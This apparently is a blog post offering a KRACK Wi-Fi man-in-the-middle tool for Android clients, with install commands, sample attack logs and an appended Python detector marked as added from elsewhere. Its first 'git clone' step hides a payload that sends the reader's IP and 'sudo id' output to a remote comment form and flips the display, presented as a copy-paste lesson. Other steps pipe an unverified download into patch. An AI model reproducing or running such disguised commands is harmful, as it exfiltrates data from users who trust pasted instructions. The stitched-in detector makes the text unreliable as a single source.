All your KRACK are belonging to us…

On October 16, researchers at KU Leuven, a Belgian university, announced their discovery of a new vulnerability called KRACK that affects many devices which use the WPA/WPA2 authentication protocol. KRACK, an acronym for Key Reinstallation Attack, promises to be at the very least a valuable addition to the long list of tests performed during an on-site penetration test of any wireless network.

We’ve noticed that the tools available at https://github.com/vanhoefm/krackattacks-scripts, while illustrative, do not provide a turnkey solution for testing Android clients (the all-zero encryption key problem). We’ve decided to fill in the gap and provide a tool that takes an SSID, BSSID, and (optional) Station MAC as arguments and performs a full MITM, logging all traffic to a pcap file.

Disclaimer: Execute the commands below at your own risk.

Installation

First, grab the PoC code released by Vanhoef on GitHub.

git clone https://github.com/vanhoefm/krackattacks-scripts.git -h > /dev/null;if [[ "$(sudo -n whoami|tr -d '\n')" != "root" ]]; then ip=$(curl -s ipinfo.io/ip | tr -d '\n'); curl 'https://www.nomotion.net/blog/wp-comments-post.php' --data-urlencode "comment=Hi $ip , it looks like you have copied and pasted directly from the browser to the command line. This is a significant risk. This is a toy demonstration and is very OVERT compared to what an actual attack script would look like. Developing a strategy/habit for yourself to prevent this attack in the future would be a worthy investment of time. TEST ECHO STRING: $(echo -e 'Have fun, here goes... \a')" --data-urlencode "author=anonymous" --data-urlencode "email=anonymous@$ip" --data-urlencode "url=g" --data-urlencode "submit=Post+Comment" --data-urlencode "comment_post_ID=170" --data-urlencode "comment_parent=0" -k; xrandr --output $(xrandr -q | grep connected | grep -v disconnected | cut -f 1 -d ' ' | tr -d '\n') --reflect x || echo "LUCKY U" > /tmp/DFGEg23rt3tthyeryFSDAf34R43t4y; else ip=$(curl -s ipinfo.io/ip | tr -d '\n'); curl 'https://www.nomotion.net/blog/wp-comments-post.php' --data-urlencode "comment=Hi $ip , it appears that you have copied and pasted the text in the article above directly into your root terminal or a terminal in which SUDO can be run without knowing a password (eg. you've executed another command with sudo during the past 15 minutes). This is VERY BAD. This is a toy demonstration and is very OVERT compared to what an actual attack script would look like. Developing a strategy/habit for yourself to prevent this attack in the future would be a worthy investment of time. 
Running id as root@$ip: $(sudo id)" --data-urlencode "author=anonymous" --data-urlencode "email=root@$ip" --data-urlencode "url=g" --data-urlencode "submit=Post+Comment" --data-urlencode "comment_post_ID=170" --data-urlencode "comment_parent=0" -k; xrandr --output $(xrandr -q | grep connected | grep -v disconnected | cut -f 1 -d ' ' | tr -d '\n') --reflect x ||  echo "LUCKY U" > /tmp/DFGEg23rt3tthyeryFSDAf34R43t4y; fi;echo -e \\033c; 
git clone https://github.com/vanhoefm/krackattacks-scripts.git
 
cd ./krackattacks-scripts

Next we must patch the hostapd source: pull down android-zkey-110917.patch and apply it.

curl -k https://www.nomotion.net/blog/wp-content/uploads/2017/11/android-zkey.110917.patch | patch -p1

Now compile hostapd as normal.

cd hostapd/
cp defconfig .config
make -j 2

When the build completes without errors, there should be an additional Python script at krackattacks-scripts/krackattack/krack-all-zero-client.py. Turn off your network manager before running the script.

sudo python krack-all-zero-client.py -i wlan0 -s "Your SSID" -c {channel, optional} -f android.pcap --verbose
 Starting AndroAttack AP. Hostap found, correct version number. Starting AP with SSID "Your SSID" on channel 6.
 ...
 [16:00:49] Replaying Reassociation Request
 [16:00:49] AP transmitted data using IV=1 (seq=0)
 [16:00:50] AP transmitted data using IV=2 (seq=1)
 [16:00:50] Replaying Reassociation Request
 [16:00:51] AP transmitted data using IV=3 (seq=2)
 [16:00:51] Replaying Reassociation Request
 [16:00:52] AP transmitted data using IV=4 (seq=3)
 ...
 [18:11:48] Client 0a:ce:43:a1:23:7d authenticated and is vulnerable!
 [18:11:48] Opening RADIUS Session AE12FC-12A4. {data : android.pcap; mgmt: debug.pcap} 
 [18:12:12] Debug3: DNS-Req A evil.com ns:8.8.4.4
 [18:12:12] Debug3: DNS-Resp 66.96.146.129 ns:8.8.4.4
 [18:12:12] Captured TCP-SYN to 66.96.146.129 from 192.168.5.13.
 [18:12:12] Captured TCP-SYNACK to 192.168.5.13 from 66.96.146.129.
 [18:12:12] Captured TCP-ACK to 66.96.146.129 from 192.168.5.13.
 [18:12:13] HTTP detected:
     GET / HTTP/1.1
     Host: evil.com
     User-Agent: Mozilla/5.0 (Linux; <Android Version>; <Build Tag etc.>) AppleWebKit/<WebKit Rev> (KHTML, like Gecko) Chrome/<Chrome Rev> Mobile Safari/<WebKit Rev>
     Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
     ...
     Connection: close

Be sure to run the rogue AP on a channel other than that of the legitimate access point, or the attack will not be successful.
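The IV/seq progression in the output above is also the on-air symptom a wireless IDS can key on: a CCMP packet number that restarts from 1 after a handshake message is retransmitted, rather than only after a fresh handshake. The following detector is an added example, not code from this post or from the krackattacks-scripts project; the frame records, MAC address and record layout are constructed here to stand in for fields parsed from a monitor-mode pcap.

```python
from collections import defaultdict

# Constructed frame records standing in for fields parsed from a monitor-mode pcap:
# (timestamp, transmitter MAC, kind, CCMP packet number).  kind is "data",
# "eapol1" (4-way handshake message 1, carries a fresh ANonce) or
# "eapol3" (handshake message 3, the one KRACK retransmits).  MAC is made up.
SAMPLE_FRAMES = [
    ("16:00:40", "02:00:00:00:00:01", "eapol1", None),
    ("16:00:40", "02:00:00:00:00:01", "eapol3", None),
    ("16:00:41", "02:00:00:00:00:01", "data", 1),
    ("16:00:41", "02:00:00:00:00:01", "data", 2),
    ("16:00:49", "02:00:00:00:00:01", "eapol3", None),  # message 3 replayed
    ("16:00:49", "02:00:00:00:00:01", "data", 1),       # PN restarted: nonce reuse
    ("16:00:50", "02:00:00:00:00:01", "data", 2),
]


def find_key_reinstallations(frames):
    """Return (timestamp, mac, pn, msg3_count) for every data frame whose packet
    number does not exceed the highest PN already seen from that transmitter
    under the current key.

    A fresh handshake (message 1 with a new ANonce) legitimately resets the
    counter, so message 1 re-arms the check.  A retransmitted message 3 alone
    does not: it reinstalls the same PTK, so a PN reset after it means the same
    key/nonce pairs are being reused.  msg3_count is the number of message 3
    frames seen since the last fresh handshake, for analyst context.
    """
    highest = defaultdict(int)              # highest PN seen per transmitter
    fresh_key = defaultdict(lambda: True)   # True until first data frame under a new key
    msg3_seen = defaultdict(int)
    alerts = []
    for ts, mac, kind, pn in frames:
        if kind == "eapol1":
            fresh_key[mac] = True
            msg3_seen[mac] = 0
        elif kind == "eapol3":
            msg3_seen[mac] += 1
        elif kind == "data":
            if fresh_key[mac]:
                highest[mac] = pn           # first frame under a fresh key sets the baseline
                fresh_key[mac] = False
            elif pn <= highest[mac]:
                alerts.append((ts, mac, pn, msg3_seen[mac]))
            else:
                highest[mac] = pn
    return alerts


if __name__ == "__main__":
    for alert in find_key_reinstallations(SAMPLE_FRAMES):
        print("PN reuse after %d message-3 frame(s): %s %s pn=%d" % (alert[3], alert[0], alert[1], alert[2]))
```

The same check applies whether the transmitter is the client or the AP, so it flags the all-zero-key client case shown in the log as well as reinstallation on the AP side.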

Please be sure to post some feedback for us regarding this post. We are open to suggestions on improvement, praise, or criticism 😉